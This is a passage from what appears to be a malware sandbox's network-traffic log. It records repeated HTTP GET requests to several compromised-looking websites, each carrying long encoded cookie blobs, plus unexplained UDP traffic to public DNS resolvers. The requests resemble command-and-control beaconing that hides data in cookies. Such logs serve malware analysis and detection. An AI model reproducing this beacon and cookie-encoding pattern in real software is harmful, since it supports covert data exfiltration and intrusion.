EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: wickandjuice.co.zaConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy07DMBD8FfIDPSHuxQSaQ9WobqnUCwrOJlnil3adNJXy8Ti4lAPywbO7M571fFaqb8kNtj5U3G8chzlTznYJMDHHKzTG2TmrtU79+mLmDCavHQHNWeNsqGlMs6LWMGfYNpM4FhJoRHWr822c2gBa+M2LKOWo/mpQ+FN/dfjBvyLN1WK/BePo+iCc8QTMuKyya5pIERpVf3D7YelYWHu/Kt6EWJ3Q3p29uwBxB1rPWRn1YEMV4huvcWlRqS5S9ut34fXTY0TQIge6RjTYgAaeyfXLFyVUpLpoMGe39XhphoC2lVerUnCyJXNXLJb55IEQrIJEYEwhsVk+xt45zWPkhorCFuzwjz+qJJBXDhBDP8AUCuuHkOZH0W3OWB53zxLNuajFucnXuzi4oI0nAe3aJbKTwZJGmX8DN3pm7vIBAADtpw4=; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: pensuni.comConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy07DMBD8FfIDPSHuxQSaQ9WobqnUCwrOJlnil3adNJXy8Ti4lAPywbO7M571fFaqb8kNtj5U3G8chzlTznYJMDHHKzTG2TmrtU79+mLmDCavHQHNWeNsqGlMs6LWMGfYNpM4FhJoRHWr822c2gBa+M2LKOWo/mpQ+FN/dfjBvyLN1WK/BePo+iCc8QTMuKyya5pIERpVf3D7YelYWHu/Kt6EWJ3Q3p29uwBxB1rPWRn1YEMV4huvcWlRqS5S9ut34fXTY0TQIge6RjTYgAaeyfXLFyVUpLpoMGe39XhphoC2lVerUnCyJXNXLJb55IEQrIJEYEwhsVk+xt45zWPkhorCFuzwjz+qJJBXDhBDP8AUCuuHkOZH0W3OWB53zxLNuajFucnXuzi4oI0nAe3aJbKTwZJGmX8DN3pm7vIBAADtpw4=; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: alseraj.netConnection: Close
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/OJnp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Van9FowL05NwxgcgwmRl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfXT27gqBOtB6zkrWg41V5Dfe2bSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDpuMGd3e5SSMaJt5WTV5ja7bIN5KFLLfPQQEKyCpYBwWRKZKkRSAcAmkKYk75ymgYWRuS3Y/p94UItaThSBf+AAYyys7+PCH0W3OWN53L1KNOeiFucmX++YuKLlswTatWl/J4NlGGTOObaBPv4As0iid/0BAADtpw4=; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: acceleratedigital.com.auConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyXrwcYq8hvv3LSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDo2mLN7e5SSMaJt5WTV5ja7bIN5KJJlPnoICFbBUkC4LIlMFSKpAGATSFOSd07TwMLI3BZs/088qEUtJ4rAP3CAMRbW93Hhj6LbnLE87l4lmnNRi3OTr3dMXNHyWQLt2rS/k8EyDDL/AaZlSa/0AQAA7acO; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: saeedmdcat.comConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyXrwcYq8hvv3LSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDo2mLN7e5SSMaJt5WTV5ja7bIN5KJJlPnoICFbBUkC4LIlMFSKpAGATSFOSd07TwMLI3BZs/088qEUtJ4rAP3CAMRbW93Hhj6LbnLE87l4lmnNRi3OTr3dMXNHyWQLt2rS/k8EyDDL/AaZlSa/0AQAA7acO; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: wickandjuice.co.zaConnection: Close
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyXrwcYq8hvv3LSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDo2mLN7e5SSMaJt5WTV5ja7bIN5KJJlPnoICFbBUkC4LIlMFSKpAGATSFOSd07TwMLI3BZs/088qEUtJ4rAP3CAMRbW93Hhj6LbnLE87l4lmnNRi3OTr3dMXNHyWQLt2rS/k8EyDDL/AaZlSa/0AQAA7acO; EAD88BCF932=8DytH4sIAAAAAAAEAO3LMQqDQBBG4atMDuAhzCLRIiq4NlsIalYdUGfRCVrk8Ak5hNXfvsdn/anZGt6ayq7Nk/tNdhmU7K/Tf1Acwsx9qyzr51abKXVc1sW94sVlL+OGJC60yf1Btu0ooofIOHsy0yaLBwAAAAAAAAAAAAAAAAAAAAAAuBR8AQ4bZ3jwEgAA7acO; EAD88BCF933=8DytH4sIAAAAAAAEAGWSyZKbMBCGX0W+JYehwK48gCTEMqy22G8MyDYzBlGCJE6VHz6Nh5Sd5Nb/13+pF7WRnLsJxfS2MQ6i+dVcBCLdAIrKYVbyguJ6EBfQWM3n7woCv3tTterEdNvs/jWFYv4p1QdE0SBM1f0Qt80WWznG1qHwIm0cTgtwC0yzknCije0RgJmQynajiK8OnV2b+3sWprl/yB3bBtdDaK1srpB2EmxnppW6DNIeTnBRZTTmaxk/8QIowspK68cdgED0Er0gtx/rTvVimFEiphlt9e0OBazQDZ2gL9++au/TYg5TP6QHt6Ta+3j6G1wv01I+dGLPrdKUL909xOqPQrKnfsnj9H9w78eIOQ5C/9Wpcsg+xDrdM7mvydhnSRa6xOMmZB/ij/+JfDa4TfamzcLUyeN1A0/gc/NPYB0qDQJihmxPQviHXKoWWBlzF1OnLKBRoyLMpK8xYeUiOK9KZpVBCm7cKPlWz+gg6lYoZMJR6VanxFHCw7ot5Qmui56V7OEs9KAD+ySPM2LtSfwGGR2Z/YgCAADtpw4=; EAD88BCF934=8DytH4sIAAAAAAAEAHOOM7U0MDW1MDAwNjIAAJSRQloNAAAA7acOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: werrrk.comConnection: Close
Source: global trafficHTTP traffic detected: GET /wordpress/ HTTP/1.1Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyXrwcYq8hvv3LSoVMcl+/Wn8PrlmSNokWKYOOptRAOvwV3SiBKqoDo2mLN7e5SSMaJt5WTV5ja7bIN5KJJlPnoICFbBUkC4LIlMFSKpAGATSFOSd07TwMLI3BZs/088qEUtJ4rAP3CAMRbW93Hhj6LbnLE87l4lmnNRi3OTr3dMXNHyWQLt2rS/k8EyDDL/AaZlSa/0AQAA7acO; 